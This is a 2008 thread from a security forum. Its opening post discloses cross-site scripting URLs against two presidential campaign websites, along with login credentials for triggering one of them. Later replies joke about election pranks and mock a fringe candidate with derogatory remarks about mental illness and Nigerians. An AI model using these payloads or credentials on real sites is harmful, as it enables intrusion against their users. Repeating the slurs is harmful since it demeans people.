Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
clinton vs. obama
Posted by: tx
Date: April 24, 2008 03:32PM

In the wake of the recent xss on obamas website redirecting to hillary clinton's site, I'd like to point out that these issues are still not fixed (these have been public for over a year now):
Obama
-----
http://my.barackobama.com/page/user/manage?uu=%22%00%0a%0d%3e%3C%2F%6E%6F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%38%38%2C%38%33%2C%38%33%29%29%3B%3C%2F%73%63%72%69%70%74%3E
Login with the following info and it will gladly redirect you and execute the javascript:
U:jquest@mytrashmail.com
P:hajji

Clinton
-------
http://www.votehillary.org/CMS/forward/%3Cimg%20src=%22fds%22onerror=%22alert(String.fromCharCode(88,83,83))%22%3E
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.votehillary.org/CMS/comment/reply/1355&edit%5Bsubject%5D=XSS!&edit%5Bcomment%5D=%22%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E&edit%5Bformat%5D=3&edit%5Bform_id%5D=comment_form&op=Preview+comment

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: clinton vs. obama
Posted by: Malkav
Date: April 24, 2008 03:39PM

and what if we XSS redirect to clinton, then XSS redirect to obama ?

oh. and make the voting machines run GNU Chess on the D day

and splog on how obama/clinton are hiding WMD in there respectives toilets.

and throw a song on waterboarding and clinton/obama remake of surfin' USA on youtube.

be a good terrahrist, prank #@!

----------------------------------------------------------------------------------------------------------------

Those that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety.
--Benjamin Franklin

Date: April 24, 2008 03:59PM

I say we redirect everything to Lee Mercer Jr's website.

Reason #3 to vote for Lee Mercer Jr.:

To prove that you need to pay the American Citizens before I die. The United States of America has been Audited by Eye Spy Community-Military Intelligence (All Three) / United States Army Military Intelligence Academy San Antonio, TX, Washington, DC, Houston, TX by copying every record in U.S. Library of Congress. The U.S. Army Military Intelligence Academy Camp Bullis San Antonio, TX Washington, D.C. Houston, Texas my home address found money to balance the United States of America’s budget and have lots of money let over. The United States Congress awarded the excess money to the American Citizens for income of $350,000.00 a year to each citizen for almost 100 years through EyeSpy Community-Military Intelligence (All Three) Business and Commerce Intelligence. This will make each citizen In America rich in Business and Commerce National and International.

-tx @ lowtech-labs.org

Edited 1 time(s). Last edit at 04/24/2008 04:01PM by tx.

Posted by: Malkav
Date: April 24, 2008 04:07PM

fake ?

is my english broken or is this guy really reads like a 8 yo reciting oscar wilde ?

----------------------------------------------------------------------------------------------------------------

Those that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety.
--Benjamin Franklin

Posted by: id
Date: April 24, 2008 05:15PM

There are some concern about how we do our concerns of circumstances.

-id

Date: April 24, 2008 05:25PM

lol, I think he's schizophrenic, although I don't think that makes him less of a viable candidate than the others that are running :P

My favorite quotes about his reasons for running for president:

9. To prove that every person in the United States and world is hooked up on an Eye Spy Community-Military Intelligence (All Three) Electronic surveillance hot-wires approved by the United States Congress for the U.S. Government Electronic Surveillance of every citizen in America for government intelligence circumstances will equal to the United States Government’s Technocracy.
17. To prove I have 1 million U.S. Military Intelligence Negro Female Lawyers and All the Negro Certified Public Accountants in the United States as the U.S. Army Military Intelligence Academy Camp Bullis San Antonio, Texas, Washington, D.C., Houston, Texas
56. To Prove Jeb Bush is all in my house with disease.

-tx @ lowtech-labs.org

Posted by: id
Date: April 24, 2008 05:44PM

I'd like to be that kind of crazy for a day, but just one.

-id

Posted by: nav
Date: April 25, 2008 01:12PM

you could be, i think its called crack...

Posted by: fragge
Date: April 29, 2008 12:03AM

"42. To Prove the New Weapon Methodology, Technology and Technocracy in the Crime War, Drug War, 50 Years of War and Peace, The War in Iran and any other war going on the World of crime. Three of the most dangerous Weapons of the Crime War today are 1. Praying For Persons to die with electronics, 2. Killing the person’s heart with an electric snake hot-wire hookup and 3. Poisoning Persons with Cancer."

Electric snake hot-wirte hookups eh? This is very obviously a hoax, although why or what humor there is in it, I don't know.. The only humor is this guys' insane ramblings.. Wonder if the donations link works, brb.

Edit: ok the donations page runs through some crappy online auction site which scrapes its items from other sites. furthermore, the donations page states: "This candidate is registered with the Federal Election Commission.", however the FEC has no record af a Lee. L. Mercer. Sounds like a stupid Nigerian hoax to me, which would explain the terrible english & the bogus donations. Of course, as Nigerians do, they failed to realise that most westerners would find their attempt at real content humorous rather than reassuring of reality. Correct me if I'm wrong of course, but I think the whole thing is just a front for bogus donations. That, or its a retarded hoax that took WAY too much effort. :P

Edited 1 time(s). Last edit at 04/29/2008 12:23AM by fragge.

Sorry, only registered users may post in this forum.